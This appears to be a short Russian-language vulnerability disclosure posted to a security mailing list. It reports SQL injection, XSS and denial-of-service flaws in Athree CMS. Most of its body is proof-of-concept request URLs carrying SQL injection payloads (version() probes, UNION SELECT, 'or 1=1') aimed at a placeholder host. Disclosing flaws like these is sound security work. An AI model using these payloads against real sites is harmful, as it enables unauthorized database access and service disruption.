Здравствуйте 3APA3A!
Сообщаю вам о найденных мною SQL DB Structure
Extraction, SQL Injection, Cross-Site Scripting и Denial
of Service уязвимостях в системе Athree CMS.
SQL DB Structure Extraction:
SQL Injection:
http://site/?p=1;c=1;s=1%20and%20version()%3E4
http://site/?p=1;c=1%20and%20version()%3E4;s=1
http://site/?p=-1%20union%20select%20version(),1,1/*;c=1;s=1
XSS (через SQL Injection):
DoS (через SQL Injection):
http://site/?p=1;c=1;s=-1%20or%201=1/*
http://site/?p=1%20or%201=1/*;c=1;s=1
Дополнительная информация о данных уязвимостях у меня
на сайте:
http://websecurity.com.ua/2227/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua